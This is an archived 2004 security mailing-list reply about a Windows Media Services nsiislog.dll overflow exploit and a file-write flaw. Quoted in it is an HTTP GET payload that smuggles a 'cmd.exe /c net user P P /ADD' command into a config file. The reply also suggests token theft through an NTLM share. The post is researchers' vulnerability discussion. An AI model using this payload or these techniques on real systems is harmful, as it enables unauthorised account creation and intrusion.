Dailydave mailing list archives
Re: New mediaservices sploit
From: Dave Aitel <dave () immunitysec com>
Date: Sat, 13 Mar 2004 14:22:53 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 H D Moore wrote: | The code was posted to a few sites, it doesn't crash nor exploit | any version of nsiislog.dll that I could find. Tested multiple | variations on a stock Windows 2000 SP0 system without any real | result. I am assuming that since its in CANVAS, it actually works | on /something/, are there any special circumstances required to | trigger it? Does the MS03-019 patch have to be installed for it be | vulnerable to this MX_Stats overflow? It almost sounds like it is | just another variation of the POST bug... is it also fixed by | MS03-022? Well, the POST bug was a heap overflow, and this bug is a stack overflow, so I dunno. It works on my version of nsiislog.dll, which is fairly old. It's been a while since I wrote it, so I don't remember exactly what happened with the patch situation. | | Brett actually found three bugs in this ISAPI; the original chunked | encoding one, then the POST content overflow, and finally the one | which was released by M$ last week. Does anyone have details on the | latest vuln? Last week? I think I must have missed it. | | Bonus points to anyone who can find a better way to exploit the | unnamed bug^H^H^Hfeature below, without being dependent on an | alternate web service or third-party software. The goal is instant | command execution through writing a file to the system with | arbitrary (even binary) contents. Writing to autoexec, startup, etc | doesn't work since it requires user interaction. Assuming Windows | 2000 or newer. Writing ".job" files to \winnt\tasks doesn't work | now that signatures are embedded (thanks Brett for info). | | GET | /plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%| | 208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%
| 20net%20user%20P%20P%20/ADD"%0A%0D HTTP/1.0 | | -HD You can't write a .asp file into the scripts directory? Or a .dll? I assume not. You're running as SYSTEM? Why not write to \\myserver\\ and steal the token and relogin through NTLM auth? - -dave | | On Saturday 13 March 2004 10:55, Dave Aitel wrote: | |> Securityfocus's vulnerability database isn't really that good for |> accuracy. I checked out their update on this media services bug, |> and noticed that one of the sploits is for something that was |> never publicly released. This is a new bug, not the old bug that |> Brett Moore found. |> |> http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker. |> c |> |> (It's in CANVAS as well, btw) |> |> -dave |> |> _______________________________________________ Dailydave mailing |> list Dailydave () lists immunitysec com |> http://www.immunitysec.com/mailman/listinfo/dailydave | | _______________________________________________ Dailydave mailing | list Dailydave () lists immunitysec com | http://www.immunitysec.com/mailman/listinfo/dailydave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFAU1+NzOrqAtg8JS8RAgv+AJwKe9u1cuTDggWG0jGGMAPHE3N7lgCfVeUR q3eaEdpJZeuG97kHz07TkOU= =E4yX -----END PGP SIGNATURE----- _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://www.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- Re: New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit wirepair (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- RE: New mediaservices sploit Brett Moore (Mar 14)
- RE: New mediaservices sploit Dave Aitel (Mar 14)
- Re: New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- Re: New mediaservices sploit wirepair (Mar 13)
- execution by WriteToFile? (was Re: New mediaservices sploit) Max Vision (Mar 14)